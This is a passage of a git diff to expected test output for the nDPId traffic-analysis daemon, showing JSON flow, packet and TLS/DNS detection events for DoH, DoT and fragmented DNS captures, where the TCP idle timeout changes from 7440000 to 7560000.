+00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","packets-captured":142,"packets-processed":142,"total-skipped-flows":0,"total-l4-data-len":12658,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1571089204031} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 142/142 diff --git a/test/results/dns_dot.pcap.out b/test/results/dns_dot.pcap.out index 9a6f29bfc..c158f294b 100644 --- a/test/results/dns_dot.pcap.out +++ b/test/results/dns_dot.pcap.out 
@@ -1,12 +1,12 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_dot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1572783663234} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572783663234,"flow_last_seen":1572783663234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572783663234,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"} -01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}} -01056{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572783663234,"flow_last_seen":1572783663234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572783663234,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"} +01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}} 
+01056{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-data-len":4269,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1572783666246} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 diff --git a/test/results/dns_fragmented.pcap.out b/test/results/dns_fragmented.pcap.out index 5d92a45d9..27ce94ee2 100644 --- a/test/results/dns_fragmented.pcap.out +++ b/test/results/dns_fragmented.pcap.out 
@@ -118,25 +118,25 @@ 00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1560869913751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":134,"pkt_l4_len":80,"thread_ts_msec":1560869913751,"pkt":"AAwpfKTLCFsOoYNeht1gDizvAFARPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXshgBQyy0\/f4GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAHADAAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTAAApBawAAAAAAAA="} 
00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} -00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="} 
-00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="} -00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="} -00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="} 
+00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="} +00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="} +00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 